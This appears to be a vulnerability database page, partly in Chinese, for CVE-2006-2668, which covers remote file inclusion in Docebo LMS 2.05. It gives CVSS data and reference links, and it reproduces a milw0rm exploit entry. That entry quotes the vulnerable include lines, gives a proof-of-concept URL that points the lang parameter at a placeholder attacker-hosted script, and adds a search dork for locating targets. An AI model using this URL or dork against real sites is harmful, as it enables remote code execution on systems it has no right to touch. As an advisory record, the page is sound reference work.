CVE-2006-2668
CVSS7.5
发布时间 :2006-05-30 17:02:00
修订时间 :2011-03-07 21:36:44
NMCOE    

[原文]Multiple PHP remote file inclusion vulnerabilities in Docebo LMS 2.05 allow remote attackers to execute arbitrary PHP code via a URL in the lang parameter to (1) modules/credits/business.php, (2) modules/credits/credits.php, or (3) modules/credits/help.php.


[CNNVD]Docebo LMS 多个远程文件包含漏洞(CNNVD-200605-530)

        Docebo LMS 2.05 存在多个PHP远程文件包含漏洞。远程攻击者可以借助对(1) modules/credits/business.php, (2) modules/credits/credits.php, 或(3) modules/credits/help.php的lang参数当中的URL,执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2668
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2668
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200605-530
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/26685
(UNKNOWN)  XF  docebolms-multiple-file-inclusion(26685)
http://www.vupen.com/english/advisories/2006/1978
(UNKNOWN)  VUPEN  ADV-2006-1978
http://securitytracker.com/id?1016159
(UNKNOWN)  SECTRACK  1016159
http://secunia.com/advisories/20298
(VENDOR_ADVISORY)  SECUNIA  20298
http://milw0rm.com/exploits/1828
(UNKNOWN)  MILW0RM  1828
http://www.securityfocus.com/bid/18110
(UNKNOWN)  BID  18110
http://www.securityfocus.com/archive/1/archive/1/435110/30/4710/threaded
(UNKNOWN)  BUGTRAQ  20060525 Docebo LMS 2.05 Remote File Include

- 漏洞信息

Docebo LMS 多个远程文件包含漏洞
高危 输入验证
2006-05-30 00:00:00 2006-05-30 00:00:00
远程  
        Docebo LMS 2.05 存在多个PHP远程文件包含漏洞。远程攻击者可以借助对(1) modules/credits/business.php, (2) modules/credits/credits.php, 或(3) modules/credits/help.php的lang参数当中的URL,执行任意PHP代码。

- 公告与补丁

        暂无数据

- 漏洞信息 (1828)

DoceboLMS <= 2.0.5 (help.php) Remote File Include Vulnerability (EDBID:1828)
php webapps
2006-05-25 Verified
0 beford
N/A [点击下载]
Vulnerable Script: Docebo LMS 2.05
Discovered: beford <xbefordx gmail com>

Noobs: %22Based+on+DoceboLMS+2.0%22

Vulnerable Files

doceboLMS205/modules/credits/business.php =>
include($_GET['lang'].'/language.php');

doceboLMS205/modules/credits/credits.php =>
include($_GET['lang'].'/language.php');

doceboLMS205/modules/credits/help.php => include($_GET['lang'].'/language.php');

http://www.oops.org/DOCEBO205/modules/credits/help.php?lang=http://<evilh4x0rscript>/?

# milw0rm.com [2006-05-25]
		

- 漏洞信息

26063
DoceboLMS modules/credits/business.php lang Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-05-25 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站